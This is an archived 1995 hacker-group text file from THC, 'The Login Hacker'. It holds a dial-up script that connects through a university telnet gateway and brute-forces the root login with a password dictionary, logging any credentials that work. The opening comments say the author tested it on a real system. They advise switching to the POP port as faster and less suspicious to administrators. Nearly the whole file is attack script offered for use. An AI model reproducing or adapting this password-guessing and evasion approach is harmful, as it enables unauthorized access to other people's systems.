home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / THC-LH10.ZIP / THC-LH_1.TXT < prev    next >
Text File  |  1996-04-14  |  3KB  |  91 lines

  1. ;                     *********  *    *     ****
  2. ;                         *      *    *    *
  3. ;                         *      ******   *  
  4. ;                         *      *    *    *
  5. ;                         *      *    *     ****
  6. ;
  7. ;                         The Hacker's Choice
  8. ;                      Part I - The Login Hacker
  9. ;                 (c) 1995 by van Hauser/THC of L.o.r.E. BBS
  10. ;-----------------------------------------------------------------------------
  11. ;
  12. ;                          SCRIPT EXAMPLE ONE
  13. ;
  14. ;    This is the same script as thc_lh.txt but without comments and command
  15. ;    descriptions. Note that THIS script is only an example. Of course this
  16. ;    system exist and i tested the script on it, i tell you that you shouldnt
  17. ;    try to hack unix systems like that if you can connect to it via the
  18. ;    internet, cause the Administrator can see the many failed login attempts!
  19. ;    You can use the POP port if you can reach the site from the internet.
  20. ;    much faster for this and is much less suspicious! Look at script 4
  21. ;    how to do that ! .... have phun ... van Hauser
  22. ;
  23. ; System description : a UNIX System in F........
  24. ;    After dialing the number you get an "name>" prompt which is of no
  25. ;    importance what you type in there. After any input except just enter
  26. ;    you'arrive at the telnet platform. From there you can telnet with the
  27. ;    CONNECT command to any server in the university network. After that you
  28. ;    get the normal login and password prompt. after 3 times you will be
  29. ;    refused and pushed back to the telnet platform.
  30. ;
  31. ; Also this script does try to hack the root account for sake of examples,
  32. ; you should *NEVER* do that! Read LOGINH.DOC about that!
  33. ;
  34. ;
  35. #DEFINE
  36. LOGFILE=C:\OUTPUT\NY-SYS5.LOG
  37. PHONE_NR=I dont tell you ;)
  38. DIAL_TRIES=3
  39. LOGIN_TRIES=0
  40. DIC(1)=C:\HACKING\DICTIONA.RY\BAD_PWS.DIC
  41.  
  42. #NOCARRIER
  43. BEEP
  44. BEEP
  45. BEEP
  46. LOG(NO CARRIER)
  47. LOG(ON $DATE $TIME)
  48. LOG(AT $DIC(1))
  49. LOG()
  50. GOTO(#START)
  51.  
  52. #START
  53. LOG(--------------------------------------------------------------------------)
  54. LOG(TARGET : $PHONE_NR    ON $DATE - $TIME)
  55. LOG()
  56. :1
  57. LOG(Dialing ...)
  58. DIAL
  59. LOG($STRING)
  60. LOG_SESSION_ON
  61. SEND()
  62. SEND()
  63. WAIT4STRING(15,^M,4,GOTO(1),name)
  64. SEND( )
  65. LOG_SESSION_OFF
  66. :2
  67. SEND(CONNECT HACK.THIS.SYSTEM.EDU)
  68. :3
  69. WAIT4STRING(30,^C,1,GOTO(2),ogin:)
  70. SEND(root)
  71. WAIT4STRING(20,^D,1,GOTO(2),assword:)
  72. SEND_NEXT_DIC(1)
  73. IF STRING~ogin: THEN GOTO(3)
  74. IF STRING~refused THEN GOTO(2)
  75. LOG()
  76. LOG($STRING)
  77. LOG()
  78. LOG(!!!!! WE GOT THROUGH !!!!!!)
  79. LOG(Login : root)
  80. LOG(Password : $DIC(1))
  81. LOG()
  82. BEEP
  83. BEEP
  84. BEEP
  85. BEEP
  86. BEEP
  87. HANGUP
  88. GOTO(#END)
  89.  
  90. #END
  91.